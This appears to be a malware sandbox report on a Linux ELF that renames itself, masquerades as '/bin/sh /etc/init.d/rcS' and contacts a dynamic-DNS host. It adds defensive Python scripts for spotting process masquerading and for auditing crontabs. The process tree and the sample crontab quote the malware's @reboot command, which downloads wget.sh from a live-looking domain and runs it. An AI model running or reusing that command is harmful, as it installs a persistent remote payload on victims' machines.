Analysis Overview
SHA256
39207de2049b011a1f01695db33fec720fb0b7044a2557948cace8e12ddf6dfa
Threat Level: Shows suspicious behavior
The file c84fca197a6c0d8da1e804407643d901.bin was found to show suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Creates/modifies Cron job
Enumerates running processes
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 01:45
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 01:45
Reported
2024-10-28 01:47
Platform
debian9-armhf-20240611-en
Max time kernel
150s
Max time network
143s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| DNS query for kingstonwikkerink.dyn sent directly to a non-default resolver (udp/53) rather than the sandbox's configured one | 194.36.144.87 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification (crontab's temporary spool file, written when the sample piped a new crontab into `crontab -`) | /var/spool/cron/crontabs/tmp.TxaXvK | /usr/bin/crontab | N/A |
Enumerates running processes
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | /bin/sh /etc/init.d/rcS | /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf | N/A |
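The signature above records an ELF in /tmp presenting itself as "/bin/sh /etc/init.d/rcS". On Linux the kernel keeps its own view of a process's identity (the /proc/<pid>/exe link) that userland cannot rewrite, whereas argv (/proc/<pid>/cmdline) and comm (/proc/<pid>/comm, settable with prctl(PR_SET_NAME)) are under the process's control. The following added example, written for this page and not part of the sandbox's own tooling, compares those three fields to surface such masquerading. It assumes a Linux procfs layout; the two ProcRecord values at the bottom are constructed, with the first mirroring the observation in this report and the pid being made up.

```python
import os
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Directories any local user can write to; an executable mapped from here is itself a signal.
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass
class ProcRecord:
    pid: int
    exe: Optional[str]   # target of /proc/<pid>/exe; None if unreadable (e.g. another user's process)
    cmdline: List[str]   # argv as the process presents it; userland can overwrite this memory
    comm: str            # /proc/<pid>/comm, at most 15 chars; changeable via prctl(PR_SET_NAME)


def read_proc(pid: int) -> Optional[ProcRecord]:
    """Collect the three identity fields the kernel exposes for one process."""
    base = f"/proc/{pid}"
    try:
        with open(f"{base}/cmdline", "rb") as fh:
            argv = [a.decode("utf-8", "replace") for a in fh.read().split(b"\0") if a]
        with open(f"{base}/comm", encoding="utf-8", errors="replace") as fh:
            comm = fh.read().strip()
    except OSError:
        return None          # process exited between listing and reading, or /proc not mounted
    try:
        exe = os.readlink(f"{base}/exe")
    except OSError:
        exe = None           # kernel thread, or insufficient privilege to follow the link
    return ProcRecord(pid, exe, argv, comm)


def masquerade_reasons(rec: ProcRecord) -> List[str]:
    """Return the reasons a process looks like it is hiding behind a false name (empty = nothing found)."""
    reasons: List[str] = []
    if rec.exe is None or not rec.cmdline:
        return reasons
    # The kernel appends " (deleted)" when the backing file was unlinked after exec.
    exe_path = rec.exe.replace(" (deleted)", "")
    exe_base = os.path.basename(exe_path)
    if exe_path.startswith(WORLD_WRITABLE):
        reasons.append(f"executable lives in a world-writable directory: {exe_path}")
    # A process that overwrote argv with a whole fake command line keeps it in argv[0],
    # so take the first whitespace-separated token as the claimed program path.
    argv0 = rec.cmdline[0].split()[0] if rec.cmdline[0].strip() else ""
    argv0_base = os.path.basename(argv0)
    if argv0_base and argv0_base != exe_base:
        # Symlinked interpreters (/bin/sh -> dash, busybox applets) legitimately differ,
        # so only flag when the claimed path does not resolve to the running executable.
        if not (os.path.isabs(argv0) and os.path.realpath(argv0) == exe_path):
            reasons.append(f"argv[0] {argv0!r} does not match executable {exe_path!r}")
    if rec.comm and rec.comm not in (exe_base[:15], argv0_base[:15]):
        reasons.append(f"comm {rec.comm!r} matches neither the executable nor argv[0]")
    return reasons


def scan_live() -> List[Tuple[int, Optional[str], List[str]]]:
    """Walk /proc on the host this runs on and return every process with at least one reason."""
    hits = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        rec = read_proc(int(name))
        if rec is None:
            continue
        reasons = masquerade_reasons(rec)
        if reasons:
            hits.append((rec.pid, rec.exe, reasons))
    return hits


# Constructed records for offline use. MASQUERADED mirrors the sandbox observation on this page
# (pid is made up); BENIGN is an ordinary cron daemon whose three identity fields agree.
MASQUERADED = ProcRecord(
    pid=1337,
    exe="/tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf",
    cmdline=["/bin/sh /etc/init.d/rcS"],
    comm="sh",
)
BENIGN = ProcRecord(pid=1, exe="/usr/sbin/cron", cmdline=["/usr/sbin/cron", "-f"], comm="cron")

if __name__ == "__main__":
    for rec in (MASQUERADED, BENIGN):
        print(rec.pid, masquerade_reasons(rec) or "ok")
    if os.path.isdir("/proc"):
        for pid, exe, reasons in scan_live():
            print(pid, exe, reasons)
```

Run it as root on a suspect host so /proc/<pid>/exe is readable for every process; unprivileged runs silently skip other users' processes. Treat a hit as a triage lead rather than a verdict: the /tmp check is the strongest of the three, while the argv[0] and comm comparisons can fire on interpreters started through symlinks that the realpath exception does not cover.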
Reads runtime system information
Processes
/tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf
[/tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab -]
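The process tree above shows the persistence mechanism in full: the sample runs `crontab -l`, appends an `@reboot` entry that changes into /tmp, fetches wget.sh with both wget and curl, makes it world-executable and runs it, then pipes the result back into `crontab -`, which is what produced the temporary spool file listed under Files. The following added example, written for this page and not part of the sandbox or the malware, audits crontab text for that download-and-execute pattern. The SAMPLE_CRONTAB text is constructed for the example (its third line reproduces the entry recorded above); the regexes and severity scale are this example's own heuristics.

```python
import os
import re
from typing import Dict, List

# Constructed crontab text. Line 3 is the @reboot entry recorded by the sandbox for this
# sample; the other lines are benign filler so the scan has something to ignore.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
*/5 * * * * /usr/local/bin/backup.sh >/dev/null 2>&1
"""

SPECIAL_SCHEDULES = {"@reboot", "@yearly", "@annually", "@monthly", "@weekly",
                     "@daily", "@midnight", "@hourly"}
# Tools commonly used to pull a second stage onto the box.
FETCH = re.compile(r"\b(?:wget|curl|tftp|ftpget|busybox\s+(?:wget|tftp))\b")
# A URL in the command; stop at shell separators so "…/wget.sh;" is captured without the ';'.
URL = re.compile(r"\b(?:https?|ftp|tftp)://[^\s'\";|&)]+")
# Making something executable, running ./file, or feeding a file to a shell.
EXEC = re.compile(r"chmod\s+(?:[0-7]{3,4}|[ugoa]*\+[rwxX]+)|(?:^|[\s;&|])\./\S+|\b(?:sh|bash|dash)\s+\S+")
# Working in a directory every local user can write to.
TMPDIR = re.compile(r"(?:^|[\s;&|])cd\s+/(?:tmp|var/tmp|dev/shm)\b|/(?:tmp|var/tmp|dev/shm)/")


def split_entry(line: str, system_format: bool = False):
    """Return (schedule, command) for one crontab line, or None for blank, comment or VAR=value lines.

    User crontabs (/var/spool/cron/crontabs/*) have five time fields then the command;
    /etc/crontab and /etc/cron.d/* carry an extra user field, selected with system_format=True.
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):
        parts = line.split(None, 2 if system_format else 1)
        if parts[0] in SPECIAL_SCHEDULES and len(parts) == (3 if system_format else 2):
            return parts[0], parts[-1]
        return None
    fields = 6 if system_format else 5
    parts = line.split(None, fields)
    if len(parts) < fields + 1:
        return None
    return " ".join(parts[:5]), parts[fields]


def analyze_crontab(text: str, system_format: bool = False) -> List[Dict[str, object]]:
    """Scan crontab text and return one finding per entry that fetches, stages or executes remote content."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        entry = split_entry(raw, system_format)
        if entry is None:
            continue
        schedule, command = entry
        reasons: List[str] = []
        fetches = bool(FETCH.search(command) and URL.search(command))
        executes = bool(EXEC.search(command))
        if fetches:
            reasons.append("downloads remote content")
        if fetches and executes:
            reasons.append("makes the download executable or runs it")
        if TMPDIR.search(command):
            reasons.append("works in a world-writable directory")
        if schedule == "@reboot" and reasons:
            reasons.append("persists across reboots (@reboot)")
        if not reasons:
            continue
        severity = "high" if fetches and executes else "medium"
        findings.append({
            "line": lineno,
            "schedule": schedule,
            "command": command,
            "urls": sorted(set(URL.findall(command))),
            "reasons": reasons,
            "severity": severity,
        })
    return findings


def scan_spool(directory: str = "/var/spool/cron/crontabs") -> Dict[str, List[Dict[str, object]]]:
    """Apply analyze_crontab to every user crontab on this host; unreadable files are skipped."""
    results = {}
    try:
        names = os.listdir(directory)
    except OSError:
        return results
    for name in names:
        path = os.path.join(directory, name)
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = analyze_crontab(fh.read())
        except OSError:
            continue
        if findings:
            results[path] = findings
    return results


if __name__ == "__main__":
    for f in analyze_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']} [{f['severity']}] {f['schedule']}: {', '.join(f['reasons'])}")
        print("   urls:", f["urls"])
```

A "high" finding (remote fetch plus chmod or direct execution) is worth pulling the referenced URL into blocklists immediately; a lone "downloads remote content" can be a legitimate health check, so it is reported at "medium" for a human to look at. Note that `crontab -` rewrites the whole spool file, so an incident timeline should also capture the file's mtime and compare it with the crontab temporary file recorded in the sandbox.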
Network
| Country | Destination | Domain | Proto |
| DE | 194.36.144.87:53 | kingstonwikkerink.dyn | udp |
| HK | 193.233.193.45:7425 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.TxaXvK
| Hash | Value |
| MD5 | 166013c72061a26359c4b71ea7e3f82c |
| SHA1 | 22f63cee554a4e6dade457c043fb687d6843b9e7 |
| SHA256 | 9ae205f20ff39c525193c69898b9fb677905ed2e6b9de9a42311135923fe96fe |
| SHA512 | bf5812345971eed2131e77131faccf5a779ebb92bb2b628c056fa339a0d714cba6fd370b5d0db55c439eac4833d9a097867167cfb0c5c70368a5b2563b1fdc06 |